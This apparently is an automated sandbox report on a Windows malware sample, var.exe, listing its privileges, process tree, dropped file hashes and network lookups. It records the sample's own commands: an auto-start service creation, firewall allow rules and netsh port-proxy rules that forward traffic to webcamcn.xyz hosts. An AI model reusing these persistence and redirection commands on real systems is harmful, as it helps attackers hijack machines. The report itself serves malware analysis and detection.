| Token: SeAuditPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\var.exe
"C:\Users\Admin\AppData\Local\Temp\var.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\var.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1718127507 " AI_EUIMSI=""
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot18" "" "" "6792c44eb" "0000000000000000" "0000000000000594" "00000000000003DC"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 159FC0863C8142F8B2CFAD5EC2245620
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 580 -s 120
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 924 -s 120
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\16655\166557.vbs
C:\Windows\system32\cmd.exe
cmd /c cscript C:\Users\Admin\16655\166557.vbs
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\16655\166557.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe cscript C:\Users\Admin\16655\166557.vbs
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "1028" "756"
C:\Windows\system32\sc.exe
sc create 166557297 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 166557297
C:\Windows\system32\netsh.exe
netsh interface portproxy add v4tov4 listenport=443 connectaddress=103.214.147.31.webcamcn.xyz connectport=443
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
C:\Windows\system32\netsh.exe
netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
C:\Windows\system32\taskkill.exe
taskkill /f /t /im wegame.exe
C:\Windows\system32\taskkill.exe
taskkill /f /t /im WeGame.exe
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | N/A | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | N/A | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | N/A | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | N/A | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | N/A | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | N/A | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | N/A | tcp |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
Files
memory/2196-0-0x0000000000200000-0x0000000000201000-memory.dmp
C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install.msi
| MD5 | 524c6546d99286d1a37ac9499035ceb9 |
| SHA1 | a0562541157d99adefc804c6079f33395c0b9d62 |
| SHA256 | 0cfef8ba27e2a2527be9675167659186c94dd4b0986aec491ccaa9ed213a4b0e |
| SHA512 | 26fdff49ac156b64b26bb42fa46917f379ed32d6849603bb5d08156c1ded509ee3c05d2f91d3a95707b05cb6c02b94ef2c03becc6f67b88c2c51e04ae0420491 |
C:\Windows\Installer\MSI35D0.tmp
| MD5 | 6119e62d8047032a715ba0670fc476c5 |
| SHA1 | 52e639024460bf111c469e95fb011c07d6fc89e8 |
| SHA256 | bc31f85266df2cdfdbe22149937105388fa3adc17e3646fa4a167736e819af77 |
| SHA512 | e7301fa21f01f7f7562b853e9bb246ed051951e3cef152bb0b3558d4863f141edbbc0c4d439c30f51f9997805490f131a5e4cd00872b61ccb08ba9d200f811d8 |
\Windows\Installer\MSI37E4.tmp
| MD5 | e7e51805794e1a71c5e2bdd45f4ee5c9 |
| SHA1 | d178d4c1deb28018a180ac3a6182e923660e16f5 |
| SHA256 | f6216d72f4d9a7d46f3b878650b2f26982e4f05b8b5ce363a60c564159db781f |
| SHA512 | 5632ceae01b6aad3d806bcdf2bdaf40e487cb3dc48d83597429dc4e9c5867a878a87ca06c3a2e43e8fc532295b5b8efbb472bd07c33f6b6629e877e3392eb576 |
C:\Windows\Installer\MSI3833.tmp
| MD5 | 0901970c2066aed8a97d75aaf1fd3146 |
| SHA1 | f0c700a4bfcebad9843e01a88bab71b5f38996d8 |
| SHA256 | 41f827e6addfc71d68cd4758336edf602349fb1230256ec135121f95c670d773 |
| SHA512 | 00e12fd2d752a01dfa75550ffaf3a2f337171cec93cd013083c37137a455e93bebd72e7d8487ec3e1de5fe22994f058829a6597765612278c20d601192cbe733 |
C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install1.cab
| MD5 | f1d5b53ebd72aa0372c5fc828d8794b3 |
| SHA1 | 4767a942af65c3d8366767f14a69d6192697e608 |
| SHA256 | 1e5b1dc6447932530edff0da158fa675324f4de502e85a2c8e89f566a9782312 |
| SHA512 | d22575da0c646f11135f87d377306dbe766be5101df332dae28ce7a7b8bdd7e0ff6878269ed83299a02c192a6e556ce117a23c52fdca0942332332160afbf6f7 |
C:\Program Files (x86)\Common Files\microsoft shared\VGX\LetsPRO.exe
| MD5 | 7bb188dfee179cbde884a0e7d127b074 |
| SHA1 | af351d674ec8515b4363b279c5ef803f7a4a3618 |
| SHA256 | 7c3308f04df19ecaa36818c4a49348e1d6921a43df5c53cb8131cc58e92889ed |
| SHA512 | 45df588d45cad6bce5dfb48626d7505140ec1c1beecb97e3f9393cb90a144ca09c1a4d4ded75fce18ac3c7dc6f5ca0b222574222bd746d60cb6068ef910a5c4b |
C:\Program Files (x86)\Common Files\microsoft shared\VGX\app-3.4.0\LetsPRO.exe
| MD5 | 93eadcdc2b275d749a70ccf1774e1bff |
| SHA1 | 444ec11e3d9512d2cba98a87b6d52a61c2c9f861 |
| SHA256 | 04aba1938bf72c36aad374fe2415e0fd0bc656d0cd5b53561c9defed40e40e35 |
| SHA512 | cbefaafcc85b6f1520c8b5610b8ef83fef54b80d35113fd138c7e1c03dfc411f49ee4cd2d0d5dc53920748ce68609843e20370f6ee2c7be5c4008e4928052a70 |
\Program Files (x86)\Common Files\microsoft shared\VGX\app-3.4.0\msvcr100.dll
| MD5 | ef3e115c225588a680acf365158b2f4a |
| SHA1 | ecda6d3b4642d2451817833b39248778e9c2cbb0 |
| SHA256 | 25d1cc5be93c7a0b58855ad1f4c9df3cfb9ec87e5dc13db85b147b1951ac6fa8 |
| SHA512 | d51f51336b7a34eb6c8f429597c3d685eb53853ee5e9d4857c40fc7be6956f1b8363d8d34bebad15ccceae45a6eb69f105f2df6a672f15fb0e6f8d0bb1afb91a |
C:\Program Files (x86)\Common Files\microsoft shared\VGX\app-3.4.0\1
| MD5 | 4d67c8f5ef8e40ad72add9ffd22e4abc |
| SHA1 | c55b71338b5ae5129fa8d39628a34f320dacc8af |
| SHA256 | 6222b03d83e0e82c8aa6c9e530af61cfa850a089db0321d921d759a55b5ee0fb |
| SHA512 | 5470a5a2a75fc30df6697c6adac40be79fae82103e5f001625dc929d1044d3d91f63243a1c8c73c6f89312fc4a2bfd5d761a06ef478ce535358d095f2cff6712 |
memory/2012-87-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/2012-115-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/2012-114-0x00000000002C0000-0x00000000002C1000-memory.dmp
memory/2012-112-0x00000000002C0000-0x00000000002C1000-memory.dmp
memory/2012-110-0x00000000002C0000-0x00000000002C1000-memory.dmp
memory/1676-128-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/1676-126-0x0000000000220000-0x0000000000221000-memory.dmp
memory/1676-124-0x0000000000220000-0x0000000000221000-memory.dmp
memory/2672-134-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2672-132-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2672-135-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/1736-151-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/1736-150-0x00000000002A0000-0x00000000002A1000-memory.dmp
memory/1736-148-0x00000000002A0000-0x00000000002A1000-memory.dmp
C:\Config.Msi\f763557.rbs
| MD5 | a4500461f7b021e64c4e875932c29ff6 |
| SHA1 | 6cf7886cf711f4ba24802b4ae9544402718d2c7d |
| SHA256 | e3d31741844de717b49c92d34e6744e46916e69c319a401b7aac2ffaf1e9a596 |
| SHA512 | ecf23cd420dc4191cd30d7060de915c2aada1c5ab0b673b99ce929ad99d020d0357fa7ab4e41da9362884c1e8ee0c5bd8d2a9d2c5698e962d425dd0dbb7b41dc |
memory/352-203-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/1028-285-0x000000001A170000-0x000000001A452000-memory.dmp
memory/1028-286-0x00000000009E0000-0x00000000009E8000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-14 17:41
Reported
2024-06-14 17:44
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
147s
Command Line
Signatures
Creates new service(s)
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\J: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\N: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\X: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\U: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\W: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\I: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\L: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\V: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\R: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
